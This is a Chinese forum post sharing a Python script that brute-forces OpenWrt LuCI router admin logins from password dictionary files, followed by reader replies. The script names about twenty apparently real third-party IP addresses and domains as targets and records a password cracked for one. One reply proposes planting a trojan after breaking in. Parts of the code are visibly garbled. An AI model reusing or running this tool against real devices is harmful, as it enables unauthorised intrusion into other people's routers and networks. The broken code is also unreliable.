openwrt 后台密码爆破
#! / usr / bin / python
# -- coding: utf-8 --**
import requests
import aiohttp
import asyncio
import sys,os
import time
import json
import logging
import atexit
# 配置logging
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
sadgfg = {
"issuccess": False,
"passflie": {
"fliepath": "",# 字典名称
"line": 0# 当前文件破解到了多少行
},
"datasucc": {
"user": None,# 当前破解的用户名称
"password": None,# 破解成功的密码
}
}
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S',
handlers=)
from termcolor import colored, cprint
def GetJsonini():
with open("example.ini", "a+",encoding="utf-8") as f:
f.seek(0,0)
if f.readlines():
f.seek(0, 0)
return json.loads(f.readlines())
else:
j = {
'data' : {}
}
return j
def savejson(j):
with open("example.ini","w",encoding="utf-8")as f:
f.seek(0,0)
f.write(json.dumps(j))
jsonss = GetJsonini()
def exit_handler():
savejson(jsonss)
logging.shutdown()
atexit.register(exit_handler)
url = None
data = {
"luci_username": "root",
"luci_password": "123456",
# "Submit": "登 陆",
}
currenttime = time.time()
async def getpage(mobile,sem):
async with sem:
headers = {
# "uuid": "6B9CBB8F-E87E-4C14-969C-96E03E30",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
"Referer": "http://183.158.77.77:8081/cgi-bin/luci/",
"Content-Type": "application/x-www-form-urlencoded",
"Upgrade-Insecure-Requests":'1',
"User-Agent": "Mozilla/5.0 (Linux; Android 12; Mi 10 Build/SKQ1.220303.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/107.0.5304.141 Mobile Safari/537.36 XWEB/5049 MMWEBSDK/20230405 MMWEBID/8973 MicroMessenger/8.0.35.2360(0x28002353) WeChat/arm64 Weixin NetType/WIFI Language/zh_CN ABI/arm64 MiniProgramEnv/android"
}
data['luci_password'] = mobile
try:
async withaiohttp.request("POST",url,data=data,headers=headers) as response:
if(len(response.history) > 0):
with open("ua.txt","a+")as f:
f.write(mobile)
print("mima",mobile,"当前耗时",time.time()-currenttime)
sys.exit(cprint('[-] Canceled by user', 'red'))
except Exception as e:
print(e)
sys.exit(cprint('[-] Canceled by user', 'red'))
# if (re.findall("'login.html\?flag=(.*?)'",res)!="0"):
# print(mobile)
sem = asyncio.Semaphore(20)
loop = asyncio.get_event_loop()
numcount = 0
def ss(passworlds,sunmmm):
"""
passworlds 密码数组
sunmmm 每组多少个
"""
for i in range(0, max(int(len(passworlds) / sunmmm), 1) + 1):
a = passworlds
if len(passworlds) - (i * sunmmm) < sunmmm:
a = passworlds[(i - 1) * sunmmm:]
tasks = []
for i in a:
c = getpage(i, sem)
task = asyncio.ensure_future(c)
tasks.append(task)
loop.run_until_complete(asyncio.wait(tasks))
def main(path,sleep:int,每组多少个:int):
files1 = []
global jsonss
global numcount
if not os.path.isfile(path):
for root, dirs, files in os.walk(path):
for file in files:
path = os.path.join(root, file)
if os.path.isfile(path) and path.split(".")[-1:].lower() == "txt":
files1.append(path)
elif path.split(".")[-1:].lower() == "txt":
files1.append(path)
else:
sys.exit(cprint('[-] 请输入路径或者文件', 'red'))
if not files1:
sys.exit(cprint('[-] 目录或路径不对', 'red'))
if not jsonss['data'].get(url,None):
jsonss['data'] = sadgfg
jsonss['data'].get(url, None)["passflie"]["fliepath"] = files1
else:
if not jsonss['data'].get(url, None)['issuccess']:
path = jsonss['data'].get(url, None)["passflie"]["fliepath"]
del files1[:files1.index(path)]
numcount = jsonss['data'].get(url, None)["passflie"]["line"]
else:
sys.exit(cprint('已破解成功', 'red'))
for i in files1:
passworlds = []
for line in open(i,"rb"):
try:
if(line.strip().decode()!=""):
passworlds.append(line.strip().decode())
except:
pass
# 密码为其它字符暂无法解析 如中文
print("字典密码总数量%s 密码文件:%s"%(len(passworlds),i) )
del passworlds[:max(numcount,1)-1]
numcount -= 1
temppasswrls = []
for i in range(0,len(passworlds),每组多少个):
if(len(passworlds)-i<每组多少个):
temppasswrls.append(passworlds)
else:
temppasswrls.append(passworlds)
for i in temppasswrls:
for j in i:
test(j)
print("已等待%s秒"%(sleep))
time.sleep(sleep)
def test(mobile):
data['luci_password'] = mobile
global numcount
numcount += 1
try:
rsponse = requests.post(url,data=data,allow_redirects=False,timeout=15,verify=False)
if(rsponse.status_code!=403):
jsonss['data'].get(url, None)["datasucc"]["password"] = str(mobile)
jsonss['data'].get(url, None)["issuccess"] = True
sys.exit(cprint('[-] 破解成功', 'red'))
else:
jsonss['data'].get(url, None)["passflie"]["line"] = numcount
logging.info('当前处理%s'%(numcount))
except Exception as e:
for i in (e.args):
print(i)
"Read timed out"
print("当前处理",numcount)
sys.exit(cprint('[-] Canceled by user', 'red'))
if __name__=="__main__":
path = "G:\\wpa2pojiezidian\\"# 可以是路径或者文件
每组间隔多久 = 14# 秒
每组多少个 = 800
# 有4万多这样的后台网站
url = "http://222.79.58.51:10001/cgi-bin/luci/"
url = "https://47.87.132.70/"
url = "http://50.46.15.209/"
url = "https://207.181.230.249/"
url = "http://72.80.138.192/cgi-bin/luci/"
url = "http://45.140.88.188:8088/cgi-bin/luci/"
url = "http://60.208.219.68:8088/cgi-bin/luci/"
url = "https://gusomaru.eu.org:8443/cgi-bin/luci/"
url = "http://24.55.7.92/"
url = "http://113.224.62.179:9003/cgi-bin/luci/"
url = "http://113.224.62.179:8332/cgi-bin/luci/"
url = "http://118.113.66.171:1080/cgi-bin/luci/"
url = "http://182.148.152.191:8091/cgi-bin/luci/"
url = "http://119.127.43.78:3000/cgi-bin/luci/"
url = "http://45.33.60.215/cgi-bin/luci/"
url = "http://123.234.164.108:18080/"
url = "https://47.87.132.70/"
url = "http://67.188.234.70:8088/cgi-bin/luci/"
url = "https://96.45.163.18:2096/cgi-bin/luci/"
# "http://183.158.77.77:8081/cgi-bin/luci/"密码password
main(path,每组间隔多久,每组多少个)
A* B=C
设B为密码,C为包。A为加密方式。
为什么要穷举B,不用C。
是不是只要知道每个软件的加密方式,就可以直接得出密码? simmtech 发表于 2023-6-23 17:48
太复杂 了,还是要支持 。
下次研究一下群晖的后台密码爆破 太复杂 了,还是要支持 。 谢谢分享! 求一个字典下载,谢谢 这个不错呀... 爆破进去,直接木马 积少成多!真厉害呀! 这样都行,那好吧 File "E:\CodeDocker\openwrt 后台密码爆破.py", line 33, in <module>
from termcolor import colored, cprint
ModuleNotFoundError: No module named 'termcolor' 老衲 发表于 2023-6-23 22:23
File "E:\CodeDocker\openwrt 后台密码爆破.py", line 33, in
from termcolor import colored, cpri ...
安装一下这个模块就好了